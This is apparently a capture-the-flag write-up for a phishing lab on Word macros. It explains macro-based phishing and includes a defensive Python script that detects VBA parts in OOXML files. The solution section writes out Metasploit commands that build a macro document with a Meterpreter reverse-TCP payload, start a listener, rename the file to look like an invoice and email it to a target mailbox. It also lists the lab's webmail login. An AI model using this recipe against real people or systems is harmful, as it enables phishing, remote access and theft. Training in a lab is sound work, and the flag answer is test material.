Day 10: He had a brain full of macros, and had shells in his soul.
Note: Before you go through this writeup, try the task yourself first; if you get stuck, come back and check out the writeup.
Phishing is a deceptive cyberattack method where attackers impersonate trusted entities to trick individuals into revealing sensitive information, such as login credentials, financial details, or personal data. These attacks are typically carried out via emails, messages, or fake websites designed to appear legitimate. Phishing often exploits human psychology, using tactics like urgency, fear, or curiosity to prompt victims to act without caution. For example, an email might claim to be from a bank, urging the recipient to verify their account details to prevent deactivation. Once the victim provides the requested information, attackers can use it for fraud, identity theft, or unauthorised access. To combat phishing, users should verify the authenticity of requests, avoid clicking on suspicious links, and enable multi-factor authentication to secure accounts.
Office Word macros can be exploited in phishing attacks to deliver malicious payloads or execute harmful actions on a victim's system. Macros are small programs embedded within Office documents, designed to automate repetitive tasks. However, attackers can embed malicious scripts into these macros, enabling them to execute harmful code when the document is opened or macros are enabled.
For example, in a phishing attack, a victim might receive an email with an attached Word document claiming to be an invoice or an official notice. When the victim opens the document, it may prompt them to "Enable Macros" to view the content. If they comply, the malicious macro activates, potentially downloading malware, stealing sensitive information, or providing attackers with remote access to the victim's system. This technique is particularly dangerous because it exploits trust in familiar tools and relies on users enabling macros without realising the risks.
Office Word macros are automated sequences of commands or instructions written in the Visual Basic for Applications (VBA) programming language, designed to perform repetitive tasks in Microsoft Word. While macros can significantly improve productivity by automating complex processes, they can also be exploited for malicious purposes. Cybercriminals often embed harmful VBA code in Word documents to execute malicious actions, such as downloading malware, stealing sensitive information, or gaining unauthorised access to a system. These malicious macros are typically delivered through phishing emails with seemingly legitimate attachments, tricking users into enabling macros and triggering the attack.
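The reason a macro document is dangerous regardless of what it is called is visible in the file format itself: a modern Word file is a ZIP package, and a macro-enabled one carries a `word/vbaProject.bin` part plus a macro-enabled content type in `[Content_Types].xml`, whatever the extension on the outside. The following Python script is an added example, not part of the original writeup or the TryHackMe room; it builds two constructed, minimal OOXML packages (not real Word exports, and the VBA part is a placeholder blob) and inspects them the way a mail gateway or analyst would, flagging the one that contains macros. Pointed at a real file (for example the document Metasploit generates), it reports the same indicators.

```python
"""Inspect a Word OOXML package for embedded VBA macros, independent of file extension."""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

# Content types that identify a macro-enabled Word document and its VBA project part.
MACRO_MAIN_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
VBA_CT = "application/vnd.ms-office.vbaProject"


def inspect_office_file(data: bytes) -> dict:
    """Return macro indicators for a Word OOXML package supplied as raw bytes."""
    result = {
        "is_ooxml": False,          # parsed as a ZIP with a [Content_Types].xml part
        "has_vba_part": False,      # a vbaProject.bin part exists in the package
        "macro_enabled_type": False,  # main document part declares the macroEnabled type
        "vba_content_type": False,  # any part is declared as a VBA project
        "parts": [],
    }
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result  # not a ZIP container, so not an OOXML document at all
    with zf:
        names = zf.namelist()
        if "[Content_Types].xml" not in names:
            return result
        result["is_ooxml"] = True
        result["parts"] = names
        # The part name, not the extension, is what Word uses to find the VBA project.
        result["has_vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        root = ET.fromstring(zf.read("[Content_Types].xml"))
        for element in root:  # both <Default> and <Override> carry a ContentType attribute
            content_type = element.get("ContentType", "")
            if content_type == MACRO_MAIN_CT:
                result["macro_enabled_type"] = True
            if content_type == VBA_CT:
                result["vba_content_type"] = True
    return result


def verdict(info: dict) -> str:
    """Collapse the indicators into a single label for triage."""
    if not info["is_ooxml"]:
        return "not-ooxml"
    if info["has_vba_part"] or info["vba_content_type"] or info["macro_enabled_type"]:
        return "macro-enabled"
    return "no-macros"


def build_sample(macro: bool) -> bytes:
    """Constructed minimal OOXML package for demonstration; not a real Word export."""
    main_ct = MACRO_MAIN_CT if macro else PLAIN_MAIN_CT
    overrides = [f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>']
    if macro:
        overrides.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CT}"/>')
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        + "".join(overrides)
        + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if macro:
            # Placeholder for the OLE compound file that would hold the VBA streams.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python inspect_macro.py invoice.docm
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], verdict(inspect_office_file(fh.read())))
    else:
        for label, blob in (("plain sample", build_sample(False)), ("macro sample", build_sample(True))):
            print(label, verdict(inspect_office_file(blob)))
```

The check deliberately ignores the file name: renaming msf.docm to invoice.docm, or to anything else, leaves the `vbaProject.bin` part and the macroEnabled content type in place, which is exactly what gateway scanners and tools such as oletools key on. Conversely, a `.docm` with no VBA part is harmless with respect to macros.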
Q: What is the flag value inside the flag.txt file that's located on the Administrator's desktop?
A: Follow the steps in the challenge to create a Word document with a TCP reverse shell macro in it and email it to marta@socmas.thm. Renaming the document to something plausible such as invoice.docm is a good idea; keep the .docm extension, since that is the macro-enabled Word format.
To generate the malicious Word file, start msfconsole and run:
use exploit/multi/fileformat/office_word_macro
set payload windows/meterpreter/reverse_tcp
set LHOST <CONNECTION_IP>
set LPORT 8888
exploit
Select the module before setting the payload, since the payload is an option of that module. <CONNECTION_IP> is the IP of your attacker box, and the port must match the listener you start next.
The generated document is written to ~/.msf4/local/msf.docm (that is, /home/<username>/.msf4/local/msf.docm on the attacker box); the module also prints the full path when it finishes.
Back in the same msf console, set up a listener to receive the TCP reverse shell connection. The payload, LHOST and LPORT must match what was baked into the document:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <CONNECTION_IP>
set LPORT 8888
exploit
Use exploit -j instead if you want the handler to run as a background job while you send the email. <CONNECTION_IP> is again the IP of your attacker box.
Open a web browser, visit the webmail portal on the target machine's IP and log in with the following credentials:
- Email: info@socmas.thm
- Password: MerryPhishMas!
Send an email to marta@socmas.thm with the malicious document attached.
After about two minutes the listener should receive the reverse shell connection and open a Meterpreter session.
In that session, navigate to the Administrator's Desktop (C:\Users\Administrator\Desktop) and read flag.txt; the flag is in there.
Happy Hacking!